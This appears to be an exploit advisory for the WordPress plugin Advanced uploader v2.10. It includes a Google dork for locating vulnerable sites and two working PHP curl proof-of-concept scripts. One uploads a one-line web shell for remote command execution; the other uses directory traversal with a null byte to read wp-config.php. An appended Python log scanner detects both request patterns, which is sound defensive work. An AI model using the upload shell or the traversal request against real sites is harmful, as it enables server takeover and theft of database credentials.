#-Title: WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
#-Author: KedAns-Dz
#- E-mail : ked-h (@hotmail. com)
#-Date: 05/12/15
#-Link Download : wordpress.org/plugins/advanced-uploader/
#-Google Dork: inurl:wp-content/plugins/advanced-uploader/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////
Description :
The WordPress plugin Advanced uploader v2.10 suffers from multiple vulnerabilities: a remote attacker can upload a file/shell/backdoor and execute commands, or disclose some local files.
Solution:
Currently, we are not aware of any vendor-supplied patches.
-- Proof Of Concept --
File Upload :
<?php
// page : upload.php
// lines : 1030... 1037
$postData = array();
$postData['file'] = "@3xploi7.php";
/* 3xploi7.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[localcrot].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
File Download :
<?php
// page : upload.php
// lines : 1219... 1237
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
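Detection :
The following is an added example, not part of the original advisory or of the plugin's code: it scans combined-format web server access logs for the two request shapes shown above, a POST to the plugin's upload.php and a `destinations` value carrying directory traversal or a null byte, including double-encoded forms. The log format, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler path and parameter name come from the advisory text.
PLUGIN_PATH = "/wp-content/plugins/advanced-uploader/upload.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Dec/2015:10:00:01 +0000] "POST /wp-content/plugins/advanced-uploader/upload.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [05/Dec/2015:10:00:09 +0000] "GET /wp-content/plugins/advanced-uploader/upload.php?destinations=../../../wp-config.php%00 HTTP/1.1" 200 3120 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [05/Dec/2015:10:01:00 +0000] "GET /wp-content/plugins/advanced-uploader/upload.php?destinations=%252e%252e%252fwp-config.php HTTP/1.1" 404 0 "-" "curl"',
    '192.0.2.10 - - [05/Dec/2015:10:02:00 +0000] "GET /index.php?destinations=../x HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ and %00 are visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return finding labels for one combined-format access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if fully_unquote(parts.path).lower() != PLUGIN_PATH:
        return []
    findings = []
    if m.group("method") == "POST":
        # Assumption: every POST to the handler is worth review; the log
        # alone cannot show whether the request was authenticated.
        findings.append("upload-post")
    for raw in parse_qs(parts.query, keep_blank_values=True).get("destinations", []):
        value = fully_unquote(raw)
        if "../" in value or "..\\" in value:
            findings.append("destinations-traversal")
        if "\x00" in value:
            findings.append("destinations-null-byte")
    return findings

def scan(lines):
    """Return (client_ip, findings) pairs for lines that produced findings."""
    return [(l.split(" ", 1)[0], f) for l in lines if (f := classify(l))]
```

A hit with status 200 on a traversal request is the one to triage first, since it suggests the handler returned file content; any hit with the upload-post label should be correlated with new files under the uploads directory.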